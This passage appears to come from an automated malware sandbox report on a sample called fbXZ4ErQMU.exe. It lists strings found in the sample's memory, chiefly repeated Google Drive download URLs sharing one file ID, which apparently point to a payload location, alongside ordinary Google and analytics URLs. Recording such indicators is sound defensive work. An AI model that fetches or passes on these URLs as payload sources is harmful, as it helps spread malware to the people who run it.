00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
      Source: fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=downloadC
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=downloadider1
      Source: fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=downloadsQ
      Source: fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/lifornia1
      Source: fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/nt.youtube.com
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53170207947.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.55855061868.0000000006EB3000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53730137731.0000000006E5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53954148204.0000000006E81000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058313741.0000000006E79000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511591295.0000000006E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys)m
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53954148204.0000000006E81000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058313741.0000000006E79000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511591295.0000000006E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys0
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53282275495.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618375979.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058380581.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53624432299.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511514177.0000000006E5E000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53394052068.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53400172887.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53170207947.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53730137731.0000000006E5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjysN
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53282275495.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618375979.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058380581.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53624432299.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511514177.0000000006E5E000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53394052068.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53400172887.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53170207947.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53730137731.0000000006E5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjysr
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726802352.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
      Source: fbXZ4ErQMU.exe, 00000003.00000003.54066069249.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54513141564.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511638576.0000000006E99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download/o
      Source: fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download3c
      Source: fbXZ4ErQMU.exe, 00000003.00000003.54965808442.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53288383266.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.55631803364.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53736517241.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54295707028.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176384633.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54072289451.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.55077258267.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.55408455725.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.56078874984.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54519162378.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54630817231.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54742573683.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.55967117540.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.55855128779.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058499277.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53960220659.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54854206265.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058313741.0000000006E79000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54407267618.0000000006E8D000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511591295.0000000006E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download6x
      Source: fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download=
      Source: fbXZ4ErQMU.exe, 00000003.00000003.56078740297.0000000006E90000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54066069249.0000000006E90000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511638576.0000000006E92000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54513141564.0000000006E90000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058091433.0000000006E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=downloadBo
      Source: fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=downloadO
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726802352.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=downloade
      Source: fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=downloadi
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=downloadid
      Source: fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=downloadu
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726802352.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/g
      Source: fbXZ4ErQMU.exe, 00000003.00000001.52635170494.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52719057837.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726802352.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719203506.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618132021.0000000006EA5000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511591295.0000000006E7A000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511638576.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058091433.0000000006E90000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53400172887.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53170207947.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53730137731.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719057837.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: fbXZ4ErQMU.exe, 00000003.00000002.56511638576.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058091433.0000000006E90000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53400172887.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53170207947.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53730137731.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719057837.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53282275495.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618375979.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058380581.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54066069249.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726610810.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53624432299.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057812723.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54513141564.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53394052068.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719203506.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511591295.0000000006E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: fbXZ4ErQMU.exe, 00000003.00000002.56511638576.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058091433.0000000006E90000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53400172887.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53170207947.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53730137731.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719057837.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53282275495.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618375979.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058380581.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058091433.0000000006EAC000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54066069249.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726610810.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53624432299.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54513141564.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53394052068.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719203506.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618132021.0000000006EA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719203506.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618132021.0000000006EA5000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511591295.0000000006E7A000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511638576.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058091433.0000000006E90000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53400172887.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53170207947.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53730137731.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719057837.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53282275495.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618375979.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058380581.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058091433.0000000006EAC000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54066069249.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726610810.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53624432299.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54513141564.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53394052068.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 